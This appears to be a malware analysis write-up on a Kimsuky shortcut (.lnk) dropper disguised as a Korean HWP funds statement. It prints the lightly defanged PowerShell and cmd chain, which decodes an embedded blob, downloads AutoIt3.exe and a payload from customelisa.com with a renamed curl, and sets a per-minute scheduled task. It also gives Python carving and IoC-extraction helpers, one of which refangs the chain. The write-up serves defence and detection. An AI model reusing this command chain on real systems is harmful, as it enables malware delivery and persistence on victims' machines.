Malware built by the North Korean hacking group Kimsuky: 자금출처명세서 ("Statement of Source of Funds"), 2025.5.26
Today we take a look at 자금출처명세서 (2025.5.26), a piece of malware made by the North Korean hacking group Kimsuky.
The malware is delivered as a Windows shortcut (.lnk). Even a quick look at the icon shows that it poses as an HWP document; that decoy document is the lure.
File name: 자금출처명세서.lnk
Size: 1 MB
MD5:fa529dd599e6d20dab3ffc95900e35cf
SHA-1:0b59408934d95418f0b82ea6ee408a98af1c75a9
SHA-256:545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883
This malware abuses PowerShell.
Malicious PowerShell code (LNK string data; the (.) / (x) insertions and hxxps are defanging, not part of the real command line)
StringData
{
namestring: Type: HWP 2022 Document
Size: 27 KB
Date modified: 03/23/2025 14:51
relativepath: not present
workingdir: not present
commandlinearguments:
/c for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\WindowsPowerShell\v1.0\*rshell(.)exe /s /b /od') do c(a)ll %a "$detail=0;<#App-Poisoning(#)>$charles='length';<#App-Pois(o)ning#>$improved=Get-Locat(i)on;$calls=&(gcm *et-(C)hild*) *(.)lnk;<#App-Poisoning#>$calls=$calls|where-obj(e)ct{$_.$charles -eq 0x00(0)088D1};<#App-Poisoning#>$recorded=($)calls;<#App-Poisonin(g)#>$calls=$calls|S(e)(l)ect-Object -ExpandProperty Name;<#App-Poisoning#>if([string]::IsNullOrEmpty($calls)){$detail=1;<#App-Poisoning#>$impr(o)ved=$env:USERPROFI(L)E;<#App-Po(i)soning#>$improved=$improved+'\appdata\local\t(e)mp';<#App-Poisoning#>$calls=Get-Ch(i)ldItem -Path $improved -Recurse -Fil(t)er *(.)lnk|where-object{$_.$ch(a)rles -eq 0x000088D1}|For(E)ach-Object{$_.FullN(a)me}|Select-Object -First 1;<#App-Poisoning#>$recorded=$calls};<#App-Poisoning#>$lis(t)ing=$calls.substring(0,$c(a)lls.length-4);$avenu(e)=[System.IO(.)BinaryReader]::new([System.IO(.)File]::open($calls,[System.IO(.)FileMode]::Open,[System(.)IO(.)FileAccess]::Read,[System(.)IO(.)FileShare]::R(e)ad));try{$ave(n)ue.BaseStream.Se(e)k(0x000017(D)C,[System(.)IO(.)SeekOrigin]::Begin);$vehicle=$avenue(.)ReadBytes(0x00(0)04800);}finally{$ave(n)ue.Close()};$entr(a)nce=0;$latter=0;$displays=$vehi(c)le.count;while ($(e)ntrance -lt $displays){$which=0(x)01;$latter=$entrance-[math]::Floor($entr(a)nce/$which)*$which;$q(u)ebec=0x8C(+)$latter;$vehicle[$ent(r)ance]=$vehicle[$entrance] -bxor $quebec;$entrance++};[System.IO.F(i)le]::Write(A)(l)lBytes($listing,$vehicle);if($detail -eq 1){$oxford=$listing}else{$oxford='.\'+$listing};& $oxford;remove-item -path $recorded -force;"&DIHyMfmgebnupUYZFtCWvlwRTsxXzAQhqPVKJiSOELBkca||cd /d c:\Users\Public\Documents & copy c:\windows\system32\curl(.)exe QeTLntG.exe & copy c:\windows\system32\schtasks(.)exe QeTLntG1(.)exe & QeTLntG -k -o AutoIt3.exe hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle0 & QeTLntG -k -o grdyKAa(.)cdr hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle1 & QeTLntG1 /delete /tn "grdy(K)Aa" /f & QeTLntG1 /create /sc min(u)te /mo 1 /tn "g(r)dyKAa" /tr "c:\Users\Public\Documents\AutoIt3(.)exe c:\Users\Public\Documents\grdyKAa(.)cdr"
iconlocation: .hwp
}
Malware analysis
1. Malware analysis
Locating a specific file
The for /f loop runs dir under C:\Windows\SysWow64\WindowsPowerShell\v1.0\ with the wildcard *rshell.exe, which matches powershell.exe (the 32-bit copy) without the string "powershell" ever appearing in the shortcut; /s searches subdirectories
/b: bare format, print the path only
/od: sort by date/time, oldest first
When a result is found, %a …
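The PowerShell stage above locates the running shortcut by its exact size (0x88D1 bytes; first in the current directory, then under %USERPROFILE%\appdata\local\temp), seeks to offset 0x17DC, reads 0x4800 bytes and XORs every byte with 0x8C + (i mod $which). Because $which is 0x01 the remainder is always 0, so the whole blob is XORed with the constant 0x8C. The result is written under the shortcut's own name minus ".lnk", opened with & $oxford, and the .lnk is deleted. The script below is an added example, not code from the original post or from the malware: it re-implements that carving in Python so the decoy can be extracted from a sample offline. The offset, length, size and key constant are the ones in the command line above; the modulus parameter generalises the loop to a repeating key of any period (an assumption for analysis convenience, the sample only uses 1), and the "sample LNK" it can build is a constructed fixture, not the real file.

```python
"""Carve the XOR-encoded decoy that the LNK's PowerShell stage extracts.

Added example (not from the original post or the malware). Offset, length,
size and key constant are those used by the script on the page.
"""
from pathlib import Path

PAYLOAD_OFFSET = 0x17DC      # $avenue.BaseStream.Seek(0x000017DC, Begin)
PAYLOAD_LENGTH = 0x4800      # $avenue.ReadBytes(0x00004800)
EXPECTED_LNK_SIZE = 0x88D1   # where-object { $_.length -eq 0x000088D1 }
KEY_BASE = 0x8C              # $quebec = 0x8C + $latter


def key_stream(length: int, modulus: int = 0x01) -> bytes:
    """Key byte i = 0x8C + (i - floor(i/modulus)*modulus) = 0x8C + (i mod modulus).

    The sample sets $which = 0x01, so i mod 1 == 0 and every byte is XORed
    with the constant 0x8C. Other moduli (assumed generalisation, not used by
    the sample) give a short repeating key 0x8C, 0x8D, ... .
    """
    if modulus < 1:
        raise ValueError("modulus must be >= 1")
    return bytes((KEY_BASE + (i % modulus)) & 0xFF for i in range(length))


def decode_payload(lnk_data: bytes, offset: int = PAYLOAD_OFFSET,
                   length: int = PAYLOAD_LENGTH, modulus: int = 0x01) -> bytes:
    """Return the decoded blob embedded at [offset, offset+length) of the LNK."""
    blob = lnk_data[offset:offset + length]
    if len(blob) < length:
        raise ValueError(f"file too small: need {offset + length:#x} bytes, "
                         f"have {len(lnk_data):#x}")
    return bytes(b ^ k for b, k in zip(blob, key_stream(length, modulus)))


def sniff(decoded: bytes) -> str:
    """Cheap format check on the decoded decoy: HWP 5.x is an OLE/CFB container,
    HWPX is a ZIP archive; anything else is reported as unknown."""
    if decoded.startswith(b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"):
        return "ole-cfb (hwp 5.x / doc)"
    if decoded.startswith(b"PK\x03\x04"):
        return "zip (hwpx / docx)"
    return "unknown"


def find_candidate_lnks(directory, size: int = EXPECTED_LNK_SIZE) -> list:
    """Mirror the script's fallback search: every *.lnk under `directory`
    whose size is exactly `size`."""
    return sorted(p for p in Path(directory).rglob("*.lnk") if p.stat().st_size == size)


def carve(lnk_path, out_dir=None) -> Path:
    """Decode the payload and write it under the LNK's name minus '.lnk'
    (the script's $listing = $calls.substring(0, $calls.length - 4))."""
    lnk_path = Path(lnk_path)
    out_dir = Path(out_dir) if out_dir else lnk_path.parent
    out = out_dir / lnk_path.name[:-4]
    out.write_bytes(decode_payload(lnk_path.read_bytes()))
    return out


def build_sample_lnk(payload: bytes, modulus: int = 0x01) -> bytes:
    """Constructed test fixture, NOT a real LNK: filler up to PAYLOAD_OFFSET,
    then the payload XOR-encoded with the same key stream, zero-padded to
    EXPECTED_LNK_SIZE so find_candidate_lnks() would pick it up."""
    if len(payload) > PAYLOAD_LENGTH:
        raise ValueError("payload does not fit in the embedded region")
    body = payload.ljust(PAYLOAD_LENGTH, b"\x00")
    enc = bytes(b ^ k for b, k in zip(body, key_stream(PAYLOAD_LENGTH, modulus)))
    return (b"L" + b"\x00" * (PAYLOAD_OFFSET - 1) + enc).ljust(EXPECTED_LNK_SIZE, b"\x00")


if __name__ == "__main__":
    import sys
    # Paths on the command line, or the same Temp folder the script falls back to.
    targets = sys.argv[1:] or find_candidate_lnks(Path.home() / "AppData/Local/Temp")
    for path in targets:
        out = carve(path)
        print(f"{path} -> {out} ({sniff(out.read_bytes())})")
```

Run it as `python carve_lnk.py 자금출처명세서.lnk` on an isolated analysis box; the decoded file lands next to the shortcut, exactly where the malware would have written it, so keep the sample in its own directory.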
IoC
Download URLs (second stage, fetched with the renamed copy of curl.exe):
https://customelisa.com/js/hurryup/?rv=bear&za=battle0 (saved as AutoIt3.exe)
https://customelisa.com/js/hurryup/?rv=bear&za=battle1 (saved as grdyKAa.cdr)
The ^ in "bear^&za" in the command line is only cmd.exe's escape for &; it is not part of the URL.
Dropped files (all in c:\Users\Public\Documents):
QeTLntG.exe (copy of c:\windows\system32\curl.exe)
QeTLntG1.exe (copy of c:\windows\system32\schtasks.exe)
AutoIt3.exe (downloaded)
grdyKAa.cdr (downloaded, passed as the argument to AutoIt3.exe)
Persistence: scheduled task "grdyKAa", created with schtasks /create /sc minute /mo 1, running c:\Users\Public\Documents\AutoIt3.exe c:\Users\Public\Documents\grdyKAa.cdr
Hashes (자금출처명세서.lnk):
MD5: fa529dd599e6d20dab3ffc95900e35cf
SHA-1: 0b59408934d95418f0b82ea6ee408a98af1c75a9
SHA-256: 545a059e5bc1ac9cc679c90d92454b53f2f0468c2aa09ad01358230e6c80d883
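Once the PowerShell stage has finished (or if it fails, because of the || operator), the cmd.exe tail copies curl.exe and schtasks.exe under random names into c:\Users\Public\Documents, downloads two files with the renamed curl and registers a scheduled task that runs every minute. The helper below is an added example, not part of the original post: it refangs the notation used on this page (single characters in parentheses, hxxps), splits the cmd chain on unescaped &, maps the random names back to the system binaries they were copied from, and pulls out the URLs, dropped files and task definition, so the IoC list above can be regenerated mechanically. DEFANGED_TAIL is the part of the command line after the || as shown earlier on the page; the parsing itself assumes only cmd.exe's ^ escaping and the curl/schtasks switches visible in that command line.

```python
"""Pull IoCs out of the LNK's second-stage cmd.exe chain.

Added example, not part of the original post. DEFANGED_TAIL is the part of
the command line after `||`, copied from the page in its defanged notation.
"""
import re

DEFANGED_TAIL = (
    r"cd /d c:\Users\Public\Documents "
    r"& copy c:\windows\system32\curl(.)exe QeTLntG.exe "
    r"& copy c:\windows\system32\schtasks(.)exe QeTLntG1(.)exe "
    r"& QeTLntG -k -o AutoIt3.exe hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle0 "
    r"& QeTLntG -k -o grdyKAa(.)cdr hxxps://customelisa(.)com/js/hurryup/?rv=bear^&za=battle1 "
    r'& QeTLntG1 /delete /tn "grdy(K)Aa" /f '
    r'& QeTLntG1 /create /sc min(u)te /mo 1 /tn "g(r)dyKAa" '
    r'/tr "c:\Users\Public\Documents\AutoIt3(.)exe c:\Users\Public\Documents\grdyKAa(.)cdr"'
)


def refang(text: str) -> str:
    """Undo the page's defanging: drop single characters wrapped in parentheses
    ("curl(.)exe" -> "curl.exe", "c(a)ll" -> "call") and restore the hxxp scheme."""
    text = re.sub(r"\(([^()])\)", r"\1", text)
    return re.sub(r"hxxp", "http", text, flags=re.IGNORECASE)


def split_chain(chain: str) -> list:
    """Split a cmd.exe chain on unescaped '&' and strip cmd's '^' escapes, so
    'bear^&za=battle0' stays inside one URL and becomes 'bear&za=battle0'."""
    parts = re.split(r"(?<!\^)&", chain)
    return [p.strip().replace("^", "") for p in parts if p.strip()]


def extract_iocs(defanged_chain: str) -> dict:
    iocs = {"workdir": None, "aliases": {}, "urls": [], "downloads": [],
            "tasks": [], "deleted_tasks": []}
    for cmd in split_chain(refang(defanged_chain)):
        tokens = cmd.split()
        verb = tokens[0].lower()
        if verb == "cd":
            iocs["workdir"] = tokens[-1]
            continue
        if verb == "copy" and len(tokens) >= 3:
            # "copy c:\windows\system32\curl.exe QeTLntG.exe": remember which
            # system binary hides behind the random name
            src = tokens[1].rsplit("\\", 1)[-1].lower()
            iocs["aliases"][tokens[2].lower()] = src
            continue
        # resolve the renamed LOLBin: "QeTLntG" -> "qetlntg.exe" -> "curl.exe"
        real = iocs["aliases"].get(verb if verb.endswith(".exe") else verb + ".exe")
        if real == "curl.exe":
            m = re.search(r"-o\s+(\S+)\s+(https?://\S+)", cmd)
            if m:
                iocs["urls"].append(m.group(2))
                iocs["downloads"].append({"url": m.group(2), "saved_as": m.group(1)})
        elif real == "schtasks.exe":
            name = re.search(r'/tn\s+"?([^"\s]+)"?', cmd)
            if "/delete" in tokens and name:
                iocs["deleted_tasks"].append(name.group(1))
            elif "/create" in tokens and name:
                sc = re.search(r"/sc\s+(\w+)", cmd)
                mo = re.search(r"/mo\s+(\d+)", cmd)
                tr = re.search(r'/tr\s+"([^"]+)"', cmd)
                iocs["tasks"].append({
                    "name": name.group(1),
                    "schedule": sc.group(1).lower() if sc else None,
                    "every": int(mo.group(1)) if mo else None,
                    "action": tr.group(1) if tr else None,
                })
    return iocs


def render(iocs: dict) -> str:
    """Plain-text IoC summary in the same shape as the list above."""
    lines = [f"working dir: {iocs['workdir']}"]
    lines += [f"renamed LOLBin: {a} = {r}" for a, r in iocs["aliases"].items()]
    lines += [f"download: {d['url']} -> {d['saved_as']}" for d in iocs["downloads"]]
    lines += [f"task {t['name']}: every {t['every']} {t['schedule']} -> {t['action']}"
              for t in iocs["tasks"]]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(extract_iocs(DEFANGED_TAIL)))
```

The alias map is the part worth keeping for detection: the process that makes the network connection is not named curl.exe on disk, so a rule keyed on the image name alone misses it, while "copy of a System32 binary into Users\Public followed by a schtasks /create with /sc minute" survives the renaming.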